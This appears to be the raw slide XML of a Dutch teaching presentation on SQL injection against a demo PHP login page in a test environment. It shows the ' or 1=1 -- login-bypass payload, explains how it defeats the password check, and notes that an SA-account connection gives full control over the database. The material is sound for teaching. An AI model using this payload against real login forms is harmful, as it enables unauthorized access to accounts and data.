            <a:endParaRPr lang="nl-NL" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="7030A0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Tekstvak 22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9394126" y="3413274"/>
            <a:ext cx="1156644" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1" smtClean="0"/>
              <a:t>abcde</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="7030A0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4200549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"Illegaal inloggen"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smtClean="0"/>
              <a:t>: Illegaal inloggen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62760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0" smtClean="0"/>
              <a:t>Stap 3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t>: illegaal inloggen</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0"/>
              <a:t> </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or  1=1  -- </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nl-NL" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t>              Klik op login ........ wat gebeurt er?  </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t>              </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t>              </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
            </a:br>
            <a:endParaRPr lang="nl-NL" sz="2800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Tekstvak 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2439609" y="5406043"/>
            <a:ext cx="6212021" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFC000"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>Vreemd genoeg ben je nu ingelogd als </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> K. de Heer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>Je bent nu ingelogd </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1" smtClean="0"/>
              <a:t>mbv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t> SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1" smtClean="0"/>
              <a:t>injection</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4015381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"Illegaal inloggen"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smtClean="0"/>
              <a:t>: Illegaal inloggen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Uitleg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t>: Hoe kan dit?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t>              Door de input als zodanig in te voeren wordt de query in de code.....</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>select * </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>from</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> gebruikers </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>where</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> name='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>bla' or 1=1 -- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> password=''</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t>             </a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t>              Bij SQL wordt alles achter </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t> gezien als commentaar. Blijft over</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t>              </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>* </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>from</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> gebruikers </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>where</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> name='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>bla' or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1=1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
            </a:br>
            <a:endParaRPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>             </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Bovenstaande query is voor iedere rij uit de tabel waar. Het resultaat</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t>              is dat de hele tabel geretourneerd wordt.</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" sz="2800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Tekstvak 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8758814" y="4998397"/>
            <a:ext cx="2903972" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFC000"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>Het password doet niet meer mee nu.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4240834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"Illegaal inloggen"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SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1" smtClean="0"/>
              <a:t>injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1" smtClean="0"/>
              <a:t>hacks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>: Illegaal inloggen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1815882"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0" smtClean="0"/>
              <a:t>Uitleg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t>: De volgende tabel wordt geretourneerd:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nl-NL" sz="2800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nl-NL" sz="2800" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>            </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t>De code selecteert de eerste uit de tabel</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Afbeelding 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7757386" y="1769831"/>
            <a:ext cx="3804159" cy="1682367"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Afbeelding 7"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="304386" y="3807242"/>
            <a:ext cx="8851013" cy="2533169"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Tekstvak 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9368894" y="3815850"/>
            <a:ext cx="2456932" cy="2308324"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFC000"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>Er wordt misbruik gemaakt van de code die er vanuit gaat dat er keurig een </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>naam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t> en </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t> zouden worden ingevuld die of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" b="1" dirty="0" smtClean="0"/>
              <a:t>geen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t> of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" b="1" dirty="0" smtClean="0"/>
              <a:t>één</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t> resultaat-rij zou opleveren.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3642514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dirty="0" smtClean="0"/>
              <a:t>testomgeving opzetten/bekijken</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>Illegaal inloggen</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nl-NL" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>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734813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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" b="0" dirty="0" err="1" smtClean="0"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" b="0" dirty="0" smtClean="0"/>
              <a:t> files bekijken.</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beschadigen van informatie(merkbaar)</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25" name="Afbeelding 24"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="247911" y="1747269"/>
            <a:ext cx="5053252" cy="1401538"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Afbeelding 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5642202" y="1747269"/>
            <a:ext cx="4689724" cy="1727793"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="27" name="Rechte verbindingslijn met pijl 26"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5385916" y="1872082"/>
            <a:ext cx="1326383"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flipV="1">
            <a:off x="7154426" y="2667577"/>
            <a:ext cx="1153546" cy="628282"/>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Tekstvak 31"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="247911" y="5263507"/>
            <a:ext cx="9981311" cy="1477328"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFC000"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>Boven : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>LOGIN.PHP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>onder: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>LOGINCONTROLE.PHP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nl-NL" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>Dit keer wordt er gebruik gemaakt van het feit dat in de code een connectie naar de database wordt gelegd </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1" smtClean="0"/>
              <a:t>mbv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t> het </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" b="1" dirty="0" smtClean="0"/>
              <a:t>SA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>-account. Dit betekent dat via die connectie </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" b="1" dirty="0" smtClean="0"/>
              <a:t>full control </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>over de database aanwezig is</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Afbeelding 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="247911" y="3535714"/>
            <a:ext cx="10328991" cy="1669332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Rechthoek 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="341644" y="3977715"/>
            <a:ext cx="1868993" cy="483753"/>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hthoek 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="341643" y="4848375"/>
            <a:ext cx="10158883" cy="290318"/>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855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de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" b="0" dirty="0" err="1" smtClean="0"/>
              <a:t>loginbox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" b="0" dirty="0" smtClean="0"/>
              <a:t>.</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beschadigen van informatie(merkbaar)</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991489" y="4369203"/>
            <a:ext cx="9981311" cy="2031325"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFC000"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>De </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1" smtClean="0"/>
              <a:t>loginbox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t> blijft gebruikt worden om commando's op de database uit te voeren. Bij de volgende demo's heeft het niets meer te maken met inloggen, het gaat slechts om het uitvoeren van Database commando's.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nl-NL" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>Realiseer je dat het voor een hacker niet altijd duidelijk is wat het resultaat van zijn commando's is. Hij heeft namelijk alleen die </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1" smtClean="0"/>
              <a:t>loginbox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t> ter beschikking. (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Het is wederom een zaak van ervaring en trial </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> error</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
